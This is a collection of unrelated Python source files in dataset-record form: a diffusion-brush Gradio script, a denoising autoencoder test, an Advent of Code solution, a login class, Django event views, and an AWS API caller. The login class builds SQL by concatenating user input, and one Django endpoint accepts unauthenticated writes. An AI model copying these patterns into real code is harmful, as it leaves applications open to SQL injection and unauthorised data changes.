FormRow().style(equal_height=False):\n enable_mask_1 = gr.Checkbox(label=\"enable mask 1\",value=False)\n mask_active_list.append(enable_mask_1.value)\n alpha_1 = gr.Slider(minimum=0.0, maximum=5.0, step=0.01, value=0.52 ,label='alpha1', elem_id=\"alpha_1\")\n alpa_list.append(alpha_1)\n with FormRow().style(equal_height=False):\n step1 = gr.Number(label='step1', placeholder=\"20\")\n step_list.append(step1)\n new_seed_1 = gr.Number(label='new_seed_1', value=-1)\n new_seed_list.append(new_seed_1)\n sigma_step_input1 = gr.Number(label='sigma_step1', value=0)\n sigma_step_list.append(sigma_step_input1)\n\n \n init_img_with_mask_1 = gr.Image(label=\"Image for brushing with mask1\", show_label=False, elem_id=\"img2maskimg1\", source=\"upload\", interactive=True, type=\"pil\", tool=\"sketch\", image_mode=\"RGBA\").style(height=480)\n add_copy_image_controls('mask1', init_img_with_mask_1)\n mask_list.append(init_img_with_mask_1)\n\n with gr.TabItem('mask2', id='mask2', elem_id=\"mask2_tab\") as tab_mask2:\n with gr.Row():\n enable_mask_2 = gr.Checkbox(label=\"enable mask 2\",value=False)\n mask_active_list.append(enable_mask_2.value)\n alpha_2 = gr.Slider(label='alpha2', minimum=0.0, maximum=5.0, step=0.01, value=0.5, elem_id=\"alpha_2\")\n alpa_list.append(alpha_2)\n with gr.Row():\n step2 = gr.Number(label='step2', placeholder=\"20\")\n step_list.append(step2)\n new_seed_2 = gr.Number(label='new_seed 2', value=-1)\n new_seed_list.append(new_seed_2)\n sigma_step_input2 = gr.Number(label='sigma_step2', value=0)\n sigma_step_list.append(sigma_step_input2)\n with gr.Row():\n init_img_with_mask_2 = gr.Image(label=\"Image for brushing with mask2\", show_label=False, elem_id=\"img2maskimg2\", source=\"upload\", interactive=True, type=\"pil\", tool=\"sketch\", image_mode=\"RGBA\").style(height=480)\n add_copy_image_controls('mask2', init_img_with_mask_2)\n mask_list.append(init_img_with_mask_2)\n\n with gr.TabItem('mask3', id='mask3', elem_id=\"mask3_tab\") as tab_mask3:\n with gr.Row():\n enable_mask_3 = gr.Checkbox(label=\"enable mask 3\",value=False)\n mask_active_list.append(enable_mask_3.value)\n alpha_3 = gr.Slider(label='alpha3', minimum=0.0, maximum=5.0, step=0.01, value=0.51, elem_id=\"alpha_3\")\n alpa_list.append(alpha_3)\n with gr.Row():\n step3 = gr.Number(label='step3', placeholder=\"20\")\n step_list.append(step3)\n new_seed_3 = gr.Number(label='new_seed 3', value=-1)\n new_seed_list.append(new_seed_3)\n sigma_step_input3 = gr.Number(label='sigma_step3', value=0)\n sigma_step_list.append(sigma_step_input3)\n\n with gr.Row():\n init_img_with_mask_3 = gr.Image(label=\"Image for brushing with mask3\", show_label=False, elem_id=\"img2maskimg3\", source=\"upload\", interactive=True, type=\"pil\", tool=\"sketch\", image_mode=\"RGBA\").style(height=480)\n add_copy_image_controls('mask3', init_img_with_mask_3)\n mask_list.append(init_img_with_mask_3)\n\n\n def copy_image(img):\n if isinstance(img, dict) and 'image' in img:\n return img['image']\n\n return img\n\n for button, name, elem in copy_image_buttons:\n button.click(\n fn=copy_image,\n inputs=[elem],\n outputs=[copy_image_destinations[name]],\n )\n button.click(\n fn=lambda: None,\n _js=\"switch_to_\"+name.replace(\" \", \"_\"),\n inputs=[],\n outputs=[],\n )\n\n def select_magic_brush_tab(tab):\n return gr.update(visible=tab in [2, 3, 4]), gr.update(visible=tab == 3),\n\n for i, elem in enumerate([tab_mask1, tab_mask2]):\n elem.select(\n fn=lambda tab=i: select_magic_brush_tab(tab),\n inputs=[],\n outputs=[],\n )\n mask_dict = {}\n 
mask_dict['mask'] = mask_list\n mask_dict['is_active'] = mask_active_list\n mask_dict['alpha'] = alpa_list\n mask_dict['step'] = step_list\n\n with gr.Row():\n run_denosing_different_seed_input = gr.Checkbox(label=\"run denosing_different seed\",value=False, visible=False)\n intermediate_step_different_seed_input = gr.Number(label='intermediate step different seed', placeholder=\"10\", visible=False)\n new_seed_intermediate = gr.Number(label='new_seed', value=-1, visible=False)\n new_prompt = gr.Textbox(label='new prompt', placeholder=\"new prompt to use\", visible=False)\n with gr.Row():\n apply_intermediate_denoising_input = gr.Checkbox(label=\"apply intermediate denoising\",value=False)\n intermediate_step_input = gr.Number(label='intermediate step', placeholder=\"20\", visible=False)\n alpha_input = gr.Slider(label='alpha', min=0, max=1, step=0.1, default=0.0, visible=False)\n \n\n return [is_active, mask_intermediate, new_seed_intermediate, new_prompt, run_denosing_different_seed_input, intermediate_step_different_seed_input, apply_intermediate_denoising_input, intermediate_step_input, alpha_input,\n init_img_with_mask_1, init_img_with_mask_2, init_img_with_mask_3,\n enable_mask_1, enable_mask_2, enable_mask_3,\n step1, step2, step3,\n alpha_1, alpha_2, alpha_3,\n new_seed_1, new_seed_2, new_seed_3,\n sigma_step_input1, sigma_step_input2, sigma_step_input3]\n \n def process(self,p, is_active, mask_intermediate, new_seed, new_prompt, run_denosing_different_seed_input, intermediate_step_different_seed_input, apply_intermediate_denoising_input, intermediate_step_input, alpha_input,\n init_img_with_mask_1, init_img_with_mask_2, init_img_with_mask_3,\n enable_mask_1, enable_mask_2, enable_mask_3,\n step1, step2, step3,\n alpha_1, alpha_2, alpha_3,\n new_seed_1, new_seed_2, new_seed_3, \n sigma_step_input1, sigma_step_input2, sigma_step_input3):\n \n global mask\n global start_noise\n global seednew \n global new_cond\n global run_denosing_different_seed\n global intermediate_step_different_seed\n global apply_intermediate_denoising\n global intermediate_step\n global new_pr \n global alpha\n \n global masks_list\n global mask_active_list\n global step_list\n global alpa_list\n global new_seed_list\n global sigma_step_list\n sigma_step = sigma_step_input1\n new_pr = new_prompt\n run_denosing_different_seed = run_denosing_different_seed_input\n intermediate_step_different_seed = intermediate_step_different_seed_input\n apply_intermediate_denoising = mask_intermediate\n intermediate_step = intermediate_step_input\n seednew = new_seed\n alpha = alpha_input\n \n mask = torch.zeros(4,64,64).cuda()\n new_cond = get_new_prompt(new_prompt, p)\n\n masks_list = [init_img_with_mask_1, init_img_with_mask_2, init_img_with_mask_3]\n mask_active_list = [enable_mask_1, enable_mask_2, enable_mask_3]\n step_list = [step1, step2, step3]\n alpa_list = [alpha_1, alpha_2, alpha_3]\n new_seed_list = [new_seed_1, new_seed_2, new_seed_3]\n sigma_step_list = [sigma_step_input1, sigma_step_input2, sigma_step_input3]\n masks_list = prepare_masks(masks_list, mask_active_list)\n\n if is_active:\n resized_mask = mask_dict['mask'].resize((64,64), Image.NEAREST)\n mask = torch.from_numpy(np.array(resized_mask)).permute(2,0,1).cuda()\n modules.processing.slerp = slerp_with_mask\n if mask_intermediate:\n k_diffusion.sampling.sample_euler = sample_euler_with_mask\n else:\n k_diffusion.sampling.sample_euler = sample_euler\n else:\n modules.processing.slerp = slerp_no_mask\n \n if mask_intermediate:\n 
k_diffusion.sampling.sample_euler = sample_euler_with_mask\n else:\n k_diffusion.sampling.sample_euler = sample_euler\n\n# to save:\n# c = mask.squeeze(0).permute(2,1,0).cpu().numpy().astype('uint8')\n# c = Image.fromarray(c)\n# c.save('test.png')\n","repo_name":"peymoon/diffusion_brush","sub_path":"diffusion_brush/scripts/diffusion_brush.py","file_name":"diffusion_brush.py","file_ext":"py","file_size_in_byte":19228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73042935842","text":"#coding:utf-8\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\nimport dataset\nfrom keras.layers import MaxPooling2D, UpSampling2D, Conv2D,LeakyReLU\nfrom skimage.measure import compare_ssim as ssim\n\nbatch_size=30\n#输入测试图像\ntestimages=dataset.show_images('Image_Denoising/',256)\n#lrelu函数\ndef lrelu(x, alpha=0.1):\n return tf.maximum(alpha * x, x)\n\n#输入到网络的数据\n#图片28*28,color_channel是1\nimg_input = tf.placeholder(tf.float32, [None, 256, 256, 1])\n#原始数据\ntargets_ = tf.placeholder(tf.float32, [None, 256, 256, 1])\nlearning_rate = tf.placeholder(tf.float32)\n\nconv1 = tf.layers.conv2d(img_input, filters=32,kernel_size=(5, 5),strides=(1, 1),padding='SAME',use_bias=True,activation=tf.nn.relu )\nconv1=tf.layers.conv2d(conv1,filters=64,kernel_size=(1,1),strides=(1,1),padding='same',use_bias=True,activation=tf.nn.relu)\n\nconv2 = tf.layers.conv2d(img_input, filters=64,kernel_size=(3,3),strides=(1, 1),padding='SAME',use_bias=True,activation=tf.nn.relu )\nconv3 = tf.layers.conv2d(img_input, filters=64,kernel_size=(1,1),strides=(1, 1),padding='SAME',use_bias=True,activation=tf.nn.relu)\n\navepool=tf.layers.average_pooling2d(img_input,pool_size=(3,3),strides=1,padding='SAME')\navepool=tf.layers.conv2d(avepool,filters=32,kernel_size=(1,1),strides=(1,1),padding='SAME',use_bias=True,activation=tf.nn.relu)\n\nconv_1=tf.concat(axis=3,values=[conv1,conv2,conv3,avepool])\nconv_1=tf.layers.batch_normalization(conv_1,axis=3)\n\nmaxpool1 = tf.layers.max_pooling2d(conv_1,pool_size=(2, 2),strides=(2, 2) )\n\n\nconv4 = tf.layers.conv2d(maxpool1, filters=32,kernel_size=(5,5),strides=(1, 1),padding='SAME',use_bias=True,activation='relu', )\nconv5 = tf.layers.conv2d(maxpool1, filters=32,kernel_size=(3,3),strides=(1, 1),padding='SAME',use_bias=True,activation='relu', )\nconv6 = tf.layers.conv2d(maxpool1, filters=32,kernel_size=(9,9),strides=(1, 1),padding='SAME',use_bias=True,activation='relu', )\nconv6_6=tf.layers.conv2d(maxpool1, filters=32,kernel_size=(7,7),strides=(1,1),padding='SAME',use_bias=True,activation='relu')\nconv_2=tf.concat(axis=3,values=[conv5,conv4,conv6_6,conv6])\nconv_2=tf.layers.batch_normalization(conv_2,axis=3)\n\n\n\nupsamples2 = tf.layers.conv2d_transpose(conv_2,filters=32,kernel_size=(3,3),padding='SAME',strides=(2,2),name='upsamples2')\nupsamples2=tf.layers.dropout(upsamples2)\nprint(upsamples2.shape)\n\n\nlogits = tf.layers.conv2d_transpose(upsamples2,filters=1,kernel_size=(3, 3),strides=(1, 1),name='logits',padding='SAME',use_bias=True)\nlogits=tf.layers.batch_normalization(logits,axis=3)\n\n# 此时的数据是 256x256x1\n # 通过sigmoid传递logits以获得重建图像\n\nlogits_=tf.add(img_input,logits)\nlogits_=tf.nn.relu(logits_)\n\ndecoded = tf.sigmoid(logits_, name='recon')\n\nwith tf.name_scope('cost'):\n # 定义损失函数和优化器\n loss = tf.nn.sigmoid_cross_entropy_with_logits(\n logits=logits, labels=targets_)\n #误差\n cost = tf.reduce_mean(loss)\n tf.summary.scalar('cost', cost)\nopt = 
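The evaluation loop below scores results with tf.image.psnr on [0, 1] images; a self-contained sanity check of that call on random data (TF 2 eager execution assumed, unlike the session-based record):

import numpy as np
import tensorflow as tf

clean = np.random.rand(1, 256, 256, 1).astype(np.float32)
noisy = np.clip(clean + np.random.normal(0, 25 / 255.0, clean.shape),
                0, 1).astype(np.float32)
print(tf.image.psnr(noisy, clean, max_val=1.0))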
tf.train.AdamOptimizer(learning_rate).minimize(cost)\n\n#设置要保存的变量\n#设置要保存的变量\nsaver = tf.train.Saver(tf.global_variables())\ninit = tf.global_variables_initializer()\n\n\nwith tf.Session() as sess:\n sess.run(init)\n summary_writer = tf.summary.FileWriter('logs/test_logs',sess.graph_def)\n #恢复变量\n saver.restore(sess,'encode_model1/model_cnn_train27_best.ckpt')\n index=0\n #添加噪声\n #noisy_im = sess.run(noisy_image,feed_dict={content_image_place_shape:content_image.shape,content_image_place:content_image/1.0})\n for i in testimages:\n index+=1\n img = i\n noisyImage = dataset.gaussian(i, 25)\n # img = dataset.pretrain_images(img)\n # noisyImage = dataset.pretrain_images(noisyImage)\n if img.ndim==2:\n img=img[None,...,None]\n if noisyImage.ndim==2:\n noisyImage=noisyImage[None,...,None]\n img=dataset.pretrain_images(img)\n noisyImage=dataset.pretrain_images(noisyImage)\n\n #预测\n pred = sess.run(decoded, feed_dict={img_input:noisyImage})\n\n psnr_score1 = tf.image.psnr(pred, img, max_val=1) # 去噪图psnr\n psnr_score2 = tf.image.psnr(noisyImage, img, max_val=1) # 噪声图psnr\n # ssim1=ssim(pred, img,multichannel=True)\n\n with tf.Session() as sess1:\n psnr_score1 = sess1.run(psnr_score1)\n psnr_score2 = sess1.run(psnr_score2)\n\n print(psnr_score1)\n # print(ssim1)\n\n im_out_denoisy = np.clip(pred[0, ..., 0] * 255, 0, 255).astype(np.uint8)\n # im_noisy = np.clip(img[0, ...,0]*255,0,255).astype(np.uint8)\n cv2.imwrite('Image_test\\\\' + str(index) + '.jpg', im_out_denoisy)\n # cv2.imwrite('Image_test_Noise\\\\'+str(index)+'.jpg',)\n\n\n# im_out_noisy = np.clip(test_x[0, ...,0]*255,0,255).astype(np.uint8)\n# im_out_denoisy = np.clip(pred[0, ...,0]*255,0,255).astype(np.uint8)\n\n#Clear Image\n\n\n#显示图像\n# plt.subplot(131)\n# plt.title('noisy')\n# plt.imshow(img_normal,cmap='gray')\n#Noisy Image\nplt.subplot(132)\nplt.title('noisy')\n# plt.imshow(im_noisy,cmap='gray')\n#Denoisy Image\n# plt.subplot(133)\nplt.title('pred')\nplt.imshow(im_out_denoisy,cmap='gray')\nplt.show()\n","repo_name":"ycy950519/ImageDenoising","sub_path":"DenoidingAutoencoderTest.py","file_name":"DenoidingAutoencoderTest.py","file_ext":"py","file_size_in_byte":5219,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"29454196743","text":"def ReadInput(ficheiro):\r\n f=open(ficheiro,\"r\")\r\n a=[]\r\n \r\n linha=f.readline()\r\n while(linha):\r\n linha=linha.strip(\"\\n\").strip(\" \")\r\n linha=int(linha)\r\n a.append(linha)\r\n linha=f.readline()\r\n \r\n f.close()\r\n return a\r\n\r\ndef Combinations(lista):\r\n combo=[]\r\n\r\n for i in range(len(lista)):\r\n for j in range(i+1,len(lista)):\r\n combo.append([lista[i],lista[j]])\r\n\r\n return combo\r\n\r\ndef FindSequence(lista,magicN):\r\n pointer=0\r\n lenght=1\r\n while(1):\r\n if(pointer+lenght>=len(lista)):\r\n pointer+=1\r\n lenght=1\r\n\r\n seq=lista[pointer:pointer+lenght]\r\n\r\n if(sum(seq))>magicN:\r\n pointer+=1\r\n lenght=1\r\n \r\n if(sum(seq)==magicN):\r\n return seq\r\n \r\n lenght+=1\r\n return -1\r\n\r\n \r\n\r\ndef main():\r\n inp=ReadInput(\"9.txt\")\r\n preamble=25\r\n #magicN=127\r\n magicN=1038347917\r\n \r\n pointer=preamble\r\n while(pointer<len(inp)):\r\n combo=Combinations(inp[pointer-preamble:pointer])\r\n combo=list(map(lambda x: x[0]+x[1],combo))\r\n if(inp[pointer] not in combo):\r\n print(inp[pointer])\r\n pointer+=1\r\n \r\n seq=FindSequence(inp,magicN)\r\n seq.sort()\r\n print(seq)\r\n\r\nif __name__ == \"__main__\":\r\n 
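FindSequence above restarts its window from scratch whenever the running sum overshoots; since all inputs are positive, a two-pointer window finds the same run in O(n):

def find_sequence_fast(nums, target):
    lo, total = 0, 0
    for hi, v in enumerate(nums):
        total += v
        while total > target and lo < hi:
            total -= nums[lo]
            lo += 1
        if total == target and hi > lo:
            return nums[lo:hi + 1]
    return None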
main()","repo_name":"FranciscoBrilhante/Advent-of-Code-2020","sub_path":"9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1145613277","text":"\n\nimport json\n\nfrom banco import insert, select\n\n\nclass Login():\n def __init__(self, info):\n self.id = '-1'\n self._login(info)\n\n def _login(self, texto=\"\"):\n j = json.loads(texto)\n # print(j)\n if('id' in j):\n self.id = j['id']\n else:\n insert({'nome': j['nome'], 'xp': 0,\n 'lv': 0, 'pontos': 0}, 'clientes')\n d = select(\n 'SELECT id FROM clientes WHERE nome=\"'+j['nome']+'\" AND xp=0 AND lv=0 AND pontos=0 ORDER BY id desc')\n self.id = d.iloc[0]['id']\n","repo_name":"ismael17-bot/TrabalhoRedesSockets","sub_path":"src/Servidor/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31439731540","text":"from django.shortcuts import render\nfrom django.core.serializers import serialize\nfrom django.http import HttpResponse\nfrom django.views.generic.base import TemplateView\nfrom django.views.generic import CreateView\n\nfrom .models import ReserveAirspace\nfrom .forms import ReserveAirspaceForm\n\n\nclass HomePageView(TemplateView):\n\n template_name = \"maps/map.html\"\n\n # def get_context_data(self, **kwargs):\n # context = super().get_context_data(**kwargs)\n # context['latest_articles'] = Article.objects.all()[:5]\n # return context\n\n\ndef all_airspace_datasets(request):\n\n # serialize(\"geojson\", City.objects.all(), geometry_field=\"point\", fields=(\"name\",))\n my_reserve_airspace = ReserveAirspace.objects.all()\n path = serialize(\n \"geojson\",\n my_reserve_airspace,\n geometry_field=\"geom\",\n fields=(\"name\", \"centroid\"),\n )\n\n # print(path, \"path\")\n return HttpResponse(path, content_type=\"json\")\n\n\ndef my_reserve_datasets(request):\n airspace = serialize(\n \"geojson\", ReserveAirspace.objects.filter(created_by=request.user)\n )\n return HttpResponse(airspace, content_type=\"json\")\n\n\nclass ReserveAirspaceCreateView(CreateView):\n \"\"\" TO DO: Restrict Pending Flights to 10 to reduce spamming\n --FIXED by queryset count and if-else in templates\n \"\"\"\n\n form_class = ReserveAirspaceForm\n model = ReserveAirspace\n template_name = \"maps/create1.html\"\n success_url = \"/maps/map\"\n\n # def get_context_data(self, *args, **kwargs):\n # context = super(ReserveAirspaceCreateView, self).get_context_data(\n # *args, **kwargs\n # )\n\n # my_pending_airspaces = ReserveAirspace.objects.filter(\n # created_by=self.request.user\n # ).filter(status=0)\n\n # context[\"my_pending_approval_airspaces\"] = my_pending_airspaces.order_by(\"-id\")[\n # :10\n # ]\n # context[\"my_pending_approval_airspaces_count\"] = my_pending_airspaces.count()\n # # context['myflightlogs'] = FlightLog.objects.filter(user=thisuser)\n # return context\n\n\nclass OldReserveAirspaceCreateView(CreateView):\n \"\"\" TO DO: Restrict Pending Flights to 10 to reduce spamming\n --FIXED by queryset count and if-else in templates\n \"\"\"\n\n form_class = ReserveAirspaceForm\n model = ReserveAirspace\n template_name = \"maps/create3.html\"\n # success_url = \"/maps/map\"\n\n def post(self, request, *args, **kwargs):\n\n print(self.request, \"request\")\n print((self.request.POST), \"request.POST\")\n\n x = ReserveAirspace.objects.create(\n name=self.request.POST[\"name\"], 
geom=self.request.POST[\"geom\"]\n )\n\n print(x, \"x\")\n\n # def get_context_data(self, *args, **kwargs):\n # context = super(ReserveAirspaceCreateView, self).get_context_data(\n # *args, **kwargs\n # )\n\n # my_pending_airspaces = ReserveAirspace.objects.filter(\n # created_by=self.request.user\n # ).filter(status=0)\n\n # context[\"my_pending_approval_airspaces\"] = my_pending_airspaces.order_by(\"-id\")[\n # :10\n # ]\n # context[\"my_pending_approval_airspaces_count\"] = my_pending_airspaces.count()\n # # context['myflightlogs'] = FlightLog.objects.filter(user=thisuser)\n # return context\n\n\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.permissions import IsAuthenticated, AllowAny\nfrom rest_framework.authentication import SessionAuthentication, BasicAuthentication\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework import status\n\n\nclass ReserveCreateAPIView(APIView):\n permission_classes = (AllowAny,)\n # authentication_classes = (TokenAuthentication, SessionAuthentication)\n\n def post(self, request):\n import json\n\n print(request.data, \"in API\")\n name = request.data[\"name\"]\n # geom = json.loads(request.data[\"geom\"])\n geom = json.loads(request.data[\"geom\"])\n\n print(name, \"name\")\n print(geom, \"geom\")\n\n # print(json.loads(geom), \" type geom\")\n # print(dir(geom), \" dir geom\")\n\n \"\"\"\n\n {\n \"type\":\"FeatureCollection\",\n \"features\":[\n {\"type\":\"Feature\",\"properties\":{},\n \"geometry\":{\"type\":\"Polygon\",\n \"coordinates\":[\n [\n [36.901230812072754,-1.3365200875255174],\n [36.901230812072754,-1.3341603846017482],\n [36.903719902038574,-1.3341603846017482],\n [36.903719902038574,-1.3365200875255174],\n [36.901230812072754,-1.3365200875255174]\n ]\n ]\n }}\n ]}\n \"\"\"\n\n geom_type = geom[\"features\"][0][\"geometry\"][\"type\"]\n\n coords = geom[\"features\"][0][\"geometry\"][\"coordinates\"][0]\n print(coords, \"coords\")\n\n from django.contrib.gis.geos import (\n GEOSGeometry,\n LineString,\n MultiLineString,\n Polygon,\n )\n\n if geom_type == \"Polygon\":\n multi_line = Polygon(coords)\n print(multi_line, \"multi_line\")\n\n # line = LineString(coords)\n # print(line, \"line\")\n\n x = ReserveAirspace.objects.create(name=name, geom=multi_line)\n print(x, \"x instance\")\n\n return Response(\n {\"ResultDesc\": \"Reserve Airspace Created successfully\"},\n content_type=\"application/json\",\n status=status.HTTP_201_CREATED,\n )\n","repo_name":"geoffreynyaga/airmap-django","sub_path":"maps/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"37831475507","text":"from .forms import EventosForm, StaffForm, InvitacionesForm, EtiquetaForm\nfrom .models import Evento, Staff, Invitacion, Etiqueta\nfrom .utils import send_email, invitacion_activacion_token, make_qr\nfrom PIL import Image\nfrom User.models import User, Usuario\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.core.mail import send_mail, EmailMultiAlternatives, EmailMessage\nfrom django.db.models import Q\nfrom django.http import HttpResponse\nfrom django.shortcuts import render,redirect\nfrom django.template.loader import get_template\nfrom django.template.loader import render_to_string\nfrom django.utils.encoding import force_bytes, force_text\nfrom 
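The APIView in the record above pulls the exterior ring out of a GeoJSON FeatureCollection by hand before building a GEOS `Polygon`. A minimal sketch of that extraction outside Django (the sample payload is a shortened stand-in; note GeoDjango's `GEOSGeometry` also accepts a GeoJSON geometry string directly):

```python
import json

payload = '''{"type": "FeatureCollection", "features": [{"type": "Feature",
  "geometry": {"type": "Polygon", "coordinates": [[[36.9012, -1.3365],
  [36.9012, -1.3341], [36.9037, -1.3341], [36.9037, -1.3365], [36.9012, -1.3365]]]}}]}'''

geometry = json.loads(payload)["features"][0]["geometry"]
if geometry["type"] == "Polygon":
    ring = geometry["coordinates"][0]      # exterior ring: closed list of [lon, lat]
    print(len(ring), ring[0] == ring[-1])  # 5 True
    # in GeoDjango: GEOSGeometry(json.dumps(geometry)) builds the same polygon
```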
django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom django.views.generic import TemplateView, ListView\nimport qrcode\n\ndef nuevaInvitacion(request):\n    \"\"\"\n    Generate a new invitation\n    \"\"\"\n    form = InvitacionesForm(request.POST or None)\n    \n    if form.is_valid():\n        form.save()\n        return redirect('Invitaciones')\n    return render(request,'invitacionesForm.html',{'form':form})\n\ndef Invitaciones(request,evento_id):\n    \"\"\"\n    View of the invitations\n    \"\"\"\n    evento = Evento.objects.all()\n    invitaciones= Invitacion.objects.all()\n    return render(request,'invitaciones.html',{'invitaciones':invitaciones})\n\ndef RegisterEvent(request, id1, id2):\n    \"\"\"\n    View to register for an event\n    \"\"\"\n    evento = Evento.objects.get(pk=id1)\n    # usuario = User.objects.get(pk=id2)\n    usuario = request.user\n    template = 'registerEvent.html'\n    context = {'evento':evento, 'user':usuario}\n    if request.method == 'POST':\n        current_site = get_current_site(request)\n        subject = 'Invitation to ' + evento.nombre\n        content = 'You have an appointment on: ' + str(evento.fecha_inicio) + ' for the event: ' + evento.nombre\n        guest = [usuario.email]\n        inv_count = Invitacion.objects.filter(evento_id=id1).count()\n        print('COUNT>>', inv_count)\n        # check capacity before saving, so a full event is not overbooked\n        if inv_count >= evento.capacidad:\n            return HttpResponse('There are no seats left :(')\n        inv = Invitacion(evento_id=evento, user_id=usuario, activa=True,\n                         asistencia_activa=False)\n        inv.save()\n        message = render_to_string('registration_mail.html', {\n            'user': usuario,\n            'domain': current_site.domain,\n            'uid':urlsafe_base64_encode(force_bytes(inv.pk)),\n            'token':invitacion_activacion_token.make_token(inv), # not sure about this one\n        })\n        img = make_qr(message)\n        img.save('images/' + str(id1) + str(request.user) + '.png')\n        nombre = 'images/' + str(id1) + str(request.user) + '.png'\n        im = Image.open(nombre)\n        Invitacion.objects.filter(pk=id1).update(qr=im)\n        content += message\n        # build the HTML email\n        email = EmailMessage(subject, content, settings.EMAIL_HOST_USER, guest)\n        email.attach_file('images/' + str(id1) + str(request.user) + '.png')\n        email.send()\n        print(usuario.email)\n        print(evento.nombre)\n        return HttpResponse('The invitation has been sent by email :3') \n    return render(request, template, context) \n\n##########################################################################\n#Events Stuff\n##########################################################################\n\ndef listMyEvents(request):\n    \"\"\"\n    View to list events \n    \"\"\"\n    eventos=Evento.objects.all()\n    return render(request,'myEvents.html',{'eventos':eventos})\n\ndef seeEvent(request,id):\n    \"\"\"\n    View a specific event\n    \"\"\"\n    evento = Evento.objects.get(id=id)\n    return render(request,'verEvento.html',{'evento':evento})\n\ndef createEvent(request):\n    \"\"\"\n    View to create an event\n    \"\"\"\n    form = EventosForm(request.POST or None)\n    if form.is_valid():\n        form.save()\n        return redirect('listMyEvents')\n    return render(request,'eventsForm.html',{'form':form})\n\ndef updateEvent(request, id):\n    \"\"\"\n    View to update an event\n    \"\"\"\n    evento = Evento.objects.get(id=id)\n    form = EventosForm(request.POST or None, instance=evento)\n    if form.is_valid():\n        form.save()\n        return redirect('listMyEvents')\n    return render(request,'eventsForm.html',{'form':form, 'evento':evento})\n# EventosForm doesn't work (?)\n\ndef deleteEvent(request, id):\n    \"\"\"\n    View to delete an event\n    \"\"\"\n    evento = Evento.objects.get(id=id)\n    if request.method == 'POST':\n        evento.delete()\n        return redirect('listMyEvents')\n    return render(request, 'prod_delete-confirm.html',{'evento':evento})
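RegisterEvent above renders an activation message, turns it into a QR image with the project's make_qr helper, and mails it as an attachment. A minimal standalone sketch of that flow with the qrcode library (the link text is a hypothetical placeholder):

```python
import qrcode

data = "https://example.com/activate/<uidb64>/<token>/"  # hypothetical activation link
img = qrcode.make(data)        # returns a PIL-compatible image
img.save("invitation_qr.png")  # then: EmailMessage(...).attach_file("invitation_qr.png")
```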
\n\nclass SearchEventsView(ListView):\n    \"\"\"\n    View to search for events\n    \"\"\"\n    model = Evento\n    template_name = 'search_results.html'\n    def get_queryset(self):\n        query = self.request.GET.get('q')\n        object_list = Evento.objects.filter(\n            # fields an event can be searched by\n            Q(nombre__icontains=query) |\n            Q(descripcion__icontains=query) |\n            Q(direccion__icontains=query) |\n            Q(fecha_inicio__icontains=query) | \n            Q(etiqueta__nombre__icontains=query) |\n            Q(precio__icontains=query)\n        )\n        return object_list\n\n##########################################################################\n#Staff Stuff\n##########################################################################\n\ndef addStaff(request):\n    \"\"\"\n    Add a staff member\n    \"\"\"\n    form = StaffForm(request.POST or None)\n    if form.is_valid():\n        form.save()\n        return redirect('listStaffs')\n    return render(request,'staffForm.html',{'form':form})\n\ndef deleteStaff(request, id):\n    \"\"\"\n    Delete a staff member\n    \"\"\"\n    staff = Staff.objects.get(id=id)\n    if request.method == 'POST':\n        staff.delete()\n        return redirect('listMyEvents')\n    return render(request, 'prod_delete-confirm.html',{'staff':staff})\n\ndef listStaffs(request):\n    \"\"\"\n    List all staff members\n    \"\"\"\n    eventos=Evento.objects.all()\n    staffs=Staff.objects.all()\n    return render(request,'myStaffs.html',{'eventos':eventos, 'staffs':staffs})\n\n##########################################################################\n# CREATE TAG\n##########################################################################\n\ndef newTag(request):\n    \"\"\"\n    Add a TAG\n    \"\"\"\n    tags=Etiqueta.objects.all()\n    form = EtiquetaForm(request.POST or None)\n    if form.is_valid():\n        form.save()\n        return redirect('createEvent')\n    return render(request,'createTag.html',{'etiquetas':tags})\n","repo_name":"mildewyPrawn/CafeCiencias","sub_path":"proyecto/app/Organizer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6762,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13435114938","text":"from dotenv import load_dotenv\nimport os\nimport boto3\nimport requests\n\nload_dotenv()\nregion = os.environ[\"api_region\"]\n\n# Simplifies making Amazon SigV4 calls with the python requests library\nfrom aws_requests_auth.boto_utils import BotoAWSRequestsAuth\ndef call_api(api_id: str, api_key=None): \n    host = api_id+'.execute-api.'+region+'.amazonaws.com'\n    base_url = f'https://{host}/api'\n    get_url = f'{base_url}/{os.environ[\"api_resource\"]}'\n\n    # Get authentication token - SigV4\n    auth = BotoAWSRequestsAuth(aws_host=host, aws_region=region, aws_service='execute-api')\n    try:\n        response = requests.get(get_url, headers={'x-api-key': api_key}, timeout=2, auth=auth)\n    except requests.exceptions.RequestException as e:\n        raise SystemExit(e)\n    return response\n\ndef main():\n    boto3_session = boto3.session.Session(region_name=region)\n\n    client = boto3_session.client('ssm')\n    api_id = client.get_parameter(Name=os.environ[\"api_id_parameter\"])['Parameter']['Value']\n    api_secret_arn = client.get_parameter(Name=os.environ[\"api_secret_parameter\"])['Parameter']['Value']\n\n    client = boto3_session.client('secretsmanager')\n    api_key = client.get_secret_value(SecretId=api_secret_arn)[\"SecretString\"]\n\n    response = call_api(api_id, api_key)\n    return 
